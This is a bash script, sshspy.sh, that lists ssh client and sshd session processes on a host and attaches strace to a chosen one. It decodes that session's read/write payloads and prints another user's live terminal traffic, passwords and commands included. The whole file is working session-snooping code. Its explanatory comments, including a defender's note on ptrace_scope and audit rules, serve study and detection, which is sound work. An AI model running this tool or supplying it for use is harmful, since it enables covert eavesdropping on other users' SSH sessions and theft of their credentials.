#!/bin/bash
# contact@infosecmatter.com
#
# sshspy.sh: lists the ssh client and sshd session processes on this host,
# lets the operator pick one, then attaches strace to that process and prints
# the payload of every read()/write() it makes, i.e. the other session's
# terminal traffic, to this script's stdout.
#
# NOTE(review), defender's view:
#  - The one precondition is ptrace access to another user's ssh/sshd process
#    (the strace -p below). On Linux that is gated by CAP_SYS_PTRACE and the
#    Yama kernel.yama.ptrace_scope sysctl; a restrictive ptrace_scope and not
#    handing out root on shared hosts removes the precondition.
#  - An interactive shell attaching ptrace to sshd is a high-signal event:
#    an audit rule on the ptrace syscall, or alerting on strace started
#    against sshd PIDs, detects this reliably.
#  - Nothing captured is written to disk; the only file touched is the
#    temporary menu file in /tmp.

# Remove the menu file on Ctrl-C. Single quotes delay expansion, so the
# tmpfile value assigned on the next line is what gets removed. Only INT is
# trapped; other signals and an EOF at the select prompt leave the file behind.
trap 'rm -f -- ${tmpfile}; exit' INT
# Menu file name: two $RANDOM values around the PID, not mktemp. The name is
# digits only (so the unquoted ${tmpfile} expansions below are safe) but it is
# guessable from the PID, the usual symlink-race concern for fixed /tmp names.
tmpfile="/tmp/$RANDOM$$$RANDOM"
# Outbound sessions: every process whose command line starts with "ssh ".
# pgrep -a prints "<pid> <cmdline>", so $pid is the PID and $a the rest. The
# PID is echoed last because the menu handler reads it back with ${opt##* }.
pgrep -a -f '^ssh ' | while read pid a; do echo "OUTBOUND $a $pid"; done >${tmpfile}
# Inbound sessions: sshd processes whose title contains '@' (sshd's
# per-session title looks like "sshd: user@pts/N"). The text after the last
# '@' is taken as the tty name and looked up in w(1) for its FROM column.
pgrep -a -f '^sshd: .*@' | while read pid a; do
tty="${a##*@}"
# grep ${tty} is an unanchored substring match: "pts/1" also matches "pts/10"
# and "pts/11", so $from may hold several lines on a busy host. Field 3 of
# w's output is the FROM column.
from="`w | grep ${tty} | awk '{print $3}'`"
echo "INBOUND $a (from $from) $pid"
done >>${tmpfile}
# One menu entry per line of the file. IFS is set to newline and never
# restored, which also makes the `read -r a` below keep leading whitespace.
IFS=$'\n'; select opt in `cat ${tmpfile}`; do
# The menu file is deleted as soon as a choice is made. A reply outside the
# menu range leaves $opt empty, so $pid is empty and strace is started with a
# bare "-p"; that case is not handled here.
rm -f -- ${tmpfile}
pid="${opt##* }"
# wfd/rfd start as the regex fragment "[0-9]" (length 5) and are replaced by
# a concrete fd number (length <= 3) once the heuristics below have picked the
# session's terminal fds; the ${#wfd}/${#rfd} length checks are how the
# branches tell "still a pattern" from "learned".
wfd="[0-9]"
rfd="[0-9]"
# strace: read/write only, all strings in hex (-xx, so payloads appear as
# \xNN escapes) and a huge -s so they are not truncated. strace writes its
# trace to stderr, hence 2>&1 before the pipe. The loop ends when the traced
# process exits or strace is stopped.
strace -e read,write -xx -s 9999999 -p ${pid} 2>&1 | while read -r a; do
# 1) Learned write fd: print the payload. One-byte writes (" = 1") are
#    skipped on this side.
if [[ "${a:0:10}" =~ ^write\(${wfd}, ]] \
&& [ ${#wfd} -le 3 ] \
&& ! [[ "$a" =~ \ =\ 1$ ]]; then
# The text between the first pair of double quotes is the hex-escaped
# payload; echo -e turns the \xNN escapes back into raw bytes and -n omits
# the trailing newline so output streams as the session produced it.
echo -en "`cut -d'"' -f2 <<<${a}`"
# 2) Learned read fd: print the payload unconditionally.
elif [[ "${a:0:10}" =~ ^read\(${rfd}, ]] \
&& [ ${#rfd} -le 3 ]; then
echo -en "`cut -d'"' -f2 <<<${a}`"
# 3) Read fd not yet learned: a read returning 1-9 bytes is a candidate, and
#    a read returning exactly one byte pins rfd to that fd. Once rfd is a
#    digit, ${rfd}+ only matches that digit repeated, so the choice is
#    effectively final.
elif [[ "$a" =~ ^read\((${rfd}+),.*\ =\ [1-9]$ ]]; then
fd="${BASH_REMATCH[1]}"
if [[ "$a" =~ \ =\ 1$ ]]; then
rfd="$fd"
fi
# 4) Write fd not yet learned (wfd still the 5-char pattern): writes whose
#    payload contains a NUL byte are ignored; a one-byte write or a payload
#    starting with CRLF (\x0d\x0a) pins wfd to that fd.
elif [[ "${a:0:10}" =~ ^write\((${wfd}+), ]] \
&& [ ${#wfd} -gt 4 ]; then
fd="${BASH_REMATCH[1]}"
if [[ "${a}" =~ \\x00 ]]; then continue; fi
if [[ "${a}" =~ \ =\ 1$ ]] || [[ "${a}" =~ \"\\x0d\\x0a ]]; then
wfd="$fd"
fi
fi
done
# Reached when strace's output ends; the script handles a single session and
# then exits rather than returning to the menu.
echo ">> SSH session ($opt) closed"
exit 0
done